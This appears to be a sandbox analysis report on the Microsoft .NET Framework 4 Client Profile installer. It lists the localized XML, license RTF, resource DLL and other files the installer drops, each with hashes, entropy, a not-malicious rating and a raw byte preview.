                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".O. .p.r.o.g.r.a.m.a. .d.e. .c.o.n.f.i.g.u.r.a.....o. .n...o. .p.o.d.e. .s.e.r. .e.x.e.c.u.t.a.d.o. .n.o. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d.e... .P.a.r.a. .m.a.i.s. .i.n.f.o.r.m.a.....e.s.,. .c.o.n.s.u.l.t.e. .o. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.i.c.h.e.i.r.o. .L.e.i.a.-.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.195239987750812
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:8ae5UfwxWr4KyGpTOSZmzmTssa8x91cvWp7eWYQKPnEtObMacxc8hjeyveCXgs:V32NAT7ZmzmYpqUvWp7eWYLXci2jpvas
                                                                                                                                                                  MD5:58CB55FA4D9E2F62F675720B1269137D
                                                                                                                                                                  SHA1:472F8E4982369C703C78091E66E33BF6B2A03F09
                                                                                                                                                                  SHA-256:9C9E0ABFDB8065ECEC3420398DA687FAD4429F4CBF68B7082C8221925BF8D86B
                                                                                                                                                                  SHA-512:123906A064033F37891DBB9C2A01A990AFD3C8447E38CDF66265784449FDD94806372A589A7DEA074830EB1DF7812E4877A1EE59171D37F1652167A03D2B961B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P......U^....@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\2070\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2070
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4015
                                                                                                                                                                  Entropy (8bit):5.250694812846901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:r4IffB09DkTLGTHD28ygHx0LlHKe1rvGA9mE0Eyh+iH/OMpiKwIurpEpiT0T8x8w:VfB8ygHclqe1ruAYEBm+imOvurerV2
                                                                                                                                                                  MD5:4518BE9A9BCA5BE1D8AC926A4B2C087D
                                                                                                                                                                  SHA1:D089427D93EA726380E89ECF00127BD51A4DCFC1
                                                                                                                                                                  SHA-256:D838ACF5ED559C58F623F73AF4902A13848502778EEA7AF585AC2E801D7C8C45
                                                                                                                                                                  SHA-512:7BCF5248E36D98D74040B6AFB08CA62A3255E397A26FF6DCA9A8E42BADF71BC0005FD8FE8B3CA3A4896434823A9E3401EEC86EF60B1A6CE395CE21A710626478
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang2070\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue0;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 TERMOS DE LICENCIAMENTO SUPLEMENTARES PARA SOFTWARE MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang2070\f0\fs22 MICROSOFT .NET FRAMEWORK 4 PARA O SISTEMA OPERATIVO MICROSOFT WINDOWS\lang1033\f1\par..\lang2070\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA O SISTEMA OPERATIVO MICROSOFT WINDOWS\par..E PACOTES DE IDIOMAS ASSOCIADOS\lang1033\f1\fs20\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang2070\b0\f0 A Microsoft Corporation (ou, dependendo do pa\'eds em que reside, uma das respectivas empresas afiliadas) licencia este suplemento para o Adquirente.\lang1033\b \lang2070\b0 Se o Adquirente es

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3076\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60816
                                                                                                                                                                  Entropy (8bit):4.3418522371704045
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                                                                                                                                  MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                                                                                                                                  SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                                                                                                                                  SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                                                                                                                                  SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z._!q.l(W.v.['`!j._.N.WL..0.Y..s.0}.......S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;....b.jHh&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..d..[. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...g.\..g.N.a(u.z._\PbkK.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):14168
                                                                                                                                                                  Entropy (8bit):5.9724110685335825
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                                                                                                                                  MD5:7C136B92983CEC25F85336056E45F3E8
                                                                                                                                                                  SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                                                                                                                                  SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                                                                                                                                  SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3076\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6309
                                                                                                                                                                  Entropy (8bit):4.470827969332999
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                                                                                                                                  MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                                                                                                                                  SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                                                                                                                                  SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                                                                                                                                  SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3082\LocalizedData.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79996
                                                                                                                                                                  Entropy (8bit):3.5542515107748844
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZq:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jrq
                                                                                                                                                                  MD5:2D54FE70376DB0218E8970B28C1C4518
                                                                                                                                                                  SHA1:83EE9AC93142751F23D5BB858F7264E27EA2EAB0
                                                                                                                                                                  SHA-256:D17C5B638E2A4D43212D21A2052548C8D4909EB6410E30B8A951A292BCDBBEDD
                                                                                                                                                                  SHA-512:20C0FB9A046911BC2D702AB321C3992262AC0F80F33DDDA5EC2CCAFE9EF07611774223369E0DC7CB91C9CDA1CBD65C598A7E1C914D6E6CA4B00205A16411BE30
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.l. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .n.o. .s.e. .p.u.e.d.e. .e.j.e.c.u.t.a.r. .e.n. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d... .P.a.r.a. .o.b.t.e.n.e.r. .m...s. .i.n.f.o.r.m.a.c.i...n.,. .v.e.a. .e.l. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.a.r.c.h.i.v.o. .L...a.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18776
                                                                                                                                                                  Entropy (8bit):5.182140892959793
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                                                                                                                                  MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                                                                                                                                  SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                                                                                                                                  SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                                                                                                                                  SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P............@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\3082\eula.rtf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3069
                                                                                                                                                                  Entropy (8bit):5.138349598257165
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:MTN3nfZQZXRFOTfyTZQDeK9xxMFcJ55HsUXHNX/RgMzsrMpDgLmqIy3W0b8EwKg3:MTBfZQZhoTfyTZQDeQxpDHsOH1ZvoMp9
                                                                                                                                                                  MD5:D40C65F632063E5CDFEF104E324D0AD4
                                                                                                                                                                  SHA1:49FABA625BADF413763BD913EDB62510D3790E98
                                                                                                                                                                  SHA-256:AAD96E7F4037E977997C630DEC015ECF09CF73C1F5B73F84944E60B309EAAB66
                                                                                                                                                                  SHA-512:6A948FA1602E517021C98861B0DF12FCB707FBBEBF094DDE96D9E60CC7DED30B07C1BF6CA8541117A362B5EB8703D61051CF187083C91076E0AD235CF72B7237
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang3082\b\f0\fs20 T\'c9RMINOS DE LICENCIA COMPLEMENTARIOS DEL SOFTWARE DE MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA EL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..Y PAQUETES DE IDIOMA ASSOCIADOS\f1\par..\pard\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, en funci\'f3n del lugar en el que resida, una de sus filiales) le concede la licencia para este complemento. Si obtiene la licencia para utilizar el sistema operativo Microsoft Windows (al que se aplica este suplemento), en adelante el "software", podr\'e1 usar e

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Client\ParameterInfo.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201796
                                                                                                                                                                  Entropy (8bit):3.4097027044493644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                                                                                                                                  MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                                                                                                                                  SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                                                                                                                                  SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                                                                                                                                  SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .C.l.i.e.n.t. .P.r.o.f.i.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\Client\UiInfo.xml

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39042
                                                                                                                                                                  Entropy (8bit):3.1132391675648923
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                                                                                                                                  MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                                                                                                                                  SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                                                                                                                                  SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                                                                                                                                  SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\DHtmlHeader.html

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16118
                                                                                                                                                                  Entropy (8bit):3.6434775915277604
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                                                                                                  MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                                                                                                  SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                                                                                                  SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                                                                                                  SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                                                                                                  C:\b53dd3b256ba71dad061693a386e\DisplayIcon.ico

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):88533
                                                                                                                                                                  Entropy (8bit):7.210526848639953
                                                                                                                                                                  Encrypted:false
